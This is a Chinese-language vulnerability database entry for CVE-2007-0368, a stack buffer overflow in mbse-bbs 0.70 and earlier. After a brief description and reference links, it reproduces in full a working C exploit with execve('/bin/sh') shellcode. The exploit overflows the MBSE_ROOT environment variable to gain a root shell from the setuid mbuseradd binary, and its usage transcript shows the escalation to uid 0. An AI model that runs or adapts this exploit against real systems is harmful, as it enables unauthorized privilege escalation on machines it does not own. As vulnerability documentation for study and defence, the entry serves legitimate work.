MBSE-BBS MBSE_ROOT 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112037 漏洞类型 缓冲区溢出
发布时间 2007-01-18 更新时间 2007-01-21
CVE编号 CVE-2007-0368 CNNVD-ID CNNVD-200701-315
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3154
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-315
|漏洞详情
mbse-bbs0.70及之前版本中存在栈缓冲区溢出漏洞。本地用户可以借助MBSE_ROOT环境变量中的一个过长的字符串,执行任意代码。
|漏洞EXP
/* GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 * ========================================================
 * Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below.
 * The current version of mbse-bbs does not contain these weaknesses. 
 * Exploitation of these vulnerabilities can facilitate a privilege escalation
 * attack in which an unprivileged user becomes root. Exploit calculates
 * return address where ASLR is not in use. Vulnerable code is shown below;
 * 
 * matthew@localhost ~/foo/mbsebbs-0.70.0/unix $  cat -n mbuseradd.c 
 * ...
 * 177          shell   = calloc(PATH_MAX, sizeof(char));
 * ...
 * 228          sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT"));
 * 
 * (heap corruption in 0.33.17/stack overflow in others).
 * *** glibc detected *** free(): invalid next size (normal): 0x0804e068 ***
 *
 * Example Usage.
 *  matthew@localhost ~ $ id
 *  uid=1000(matthew) gid=100(users) groups=10(wheel),100(users)
 *  matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd
 *  [ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 *  [ Using return address 0xbfffefd8
 *  sh-3.1# id
 *  uid=0(root) gid=1(bin) groups=10(wheel),100(users)
 * 
 * - prdelka
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x31\xc0\x50\x68""//sh""\x68""/bin""\x89\xe3"
                 "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc,char* argv[]) {
        int i;
        long eip = 0x41414141;
	char envh[]="MBSE_ROOT=";
	printf("[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit\n");
        if(argc < 2) {
                printf("Error: [path]\n");
                exit(0);
        }
        char* buffer = malloc(strlen(envh) + 4085 + sizeof(eip));
	strcpy(buffer,envh);
        long ptr = (long)buffer;	
        for(i = 1;i <= 4061;i++){
                strncat(buffer,"A",1);
        }
        ptr = ptr + 4061;
        memcpy((char*)ptr,(char*)&eip,4);
        eip = 0xc0000000 -4 -strlen(argv[1]) -1 -strlen(buffer) -1 -strlen(shellcode) -1;
        memcpy((char*)ptr,(char*)&eip,4);
        char *env[] = {buffer,NULL};
        printf("[ Using return address 0x%x\n",eip);
        execle(argv[1],argv[1],"x","x","x",shellcode,NULL,env);
        exit(0);
}

// milw0rm.com [2007-01-18]
|参考资料

来源:BID
名称:22112
链接:http://www.securityfocus.com/bid/22112
来源:MILW0RM
名称:3154
链接:http://www.milw0rm.com/exploits/3154
来源:MISC
链接:http://www.mbse.eu/mbse/mbsebbs/index.html
来源:XF
名称:mbsebbs-mbuseradd-bo(31639)
链接:http://xforce.iss.net/xforce/xfdb/31639
来源:MILW0RM
名称:3154
链接:http://milw0rm.com/exploits/3154
来源:FULLDISC
名称:20070118mbsebbs0.70.0&belowlocalrootexploit
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2007-January/051859.html